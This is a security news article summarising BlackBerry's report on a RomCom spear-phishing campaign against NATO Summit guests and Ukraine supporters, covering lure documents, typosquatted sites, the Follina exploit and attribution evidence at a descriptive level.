Pierluigi Paganini July 10, 2023

Threat actors are targeting NATO and groups supporting Ukraine in a spear-phishing campaign distributing the RomCom RAT.

On July 4, the BlackBerry Threat Research and Intelligence team uncovered a spear phishing campaign aimed at an organization supporting Ukraine abroad.

The researchers discovered two lure documents submitted from an IP address in Hungary, both targeting upcoming NATO Summit guests who are providing support to Ukraine.

The lure documents identified by BlackBerry impersonate Ukrainian World Congress, a legitimate non-profit, (“Overview_of_UWCs_UkraineInNATO_campaign.docx“) appear as a letter declaring support to the Ukrainian government for the inclusion to the NATO alliance (“Letter_NATO_Summit_Vilnius_2023_ENG(1).docx“).

The experts attributed the attacks to a threat actor known as RomCom (aka Tropical Scorpius and UNC2596) based on tactics, techniques, and procedures (TTPs), code similarity, and attack infrastructure.

The upcoming NATO Summit will be held in Vilnius on July 11-12, during the event, it will be discussed the possible future membership in the alliance of Ukraine.

Threat actors aimed at engaging the victims into clicking on a specially crafted replica of the Ukrainian World Congress website.

The attackers used typosquatting techniques to masquerade the fake website with a .info suffix and make it look legitimate.

The cloned websites were spotted hosting weaponized versions of popular software.

“Once the Microsoft Word file is downloaded and executed/opened by the user, an OLE object is loaded from the RTF, which connects to the IP address 104.234.239[.]26, which is related to VPN/proxies services. The connections are made to ports 80, 139, and 445 (HTTP and SMB services).” reads the report published by BlackBerry. “This file’s goal is to load the OLE streams into Microsoft Word, to render an iframe tag responsible for the execution of the next stage of malware.”

Upon opening the documents, a multi-stage attack chain is triggered, it also exploits the flaw CVE-2022-30190, aka known as Follina, affecting Microsoft’s Support Diagnostic Tool (MSDT).

The last stage malware is the RomCom RAT which is used by operators to collect information about the compromised system and execute remote commands.

“Based on the available information, we have medium to high confidence to conclude that this is a RomCom rebranded operation, or that one or more members of the RomCom threat group are behind this new campaign supporting a new threat group.” concludes the report. “The information we base this conclusion on includes: 

• Geopolitical context
• Domain’s registration and HTML scraping of legitimate websites
• Certain similarities in the code between this campaign and previously known RomCom campaigns
• Network infrastructure information”

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, RomCom RAT)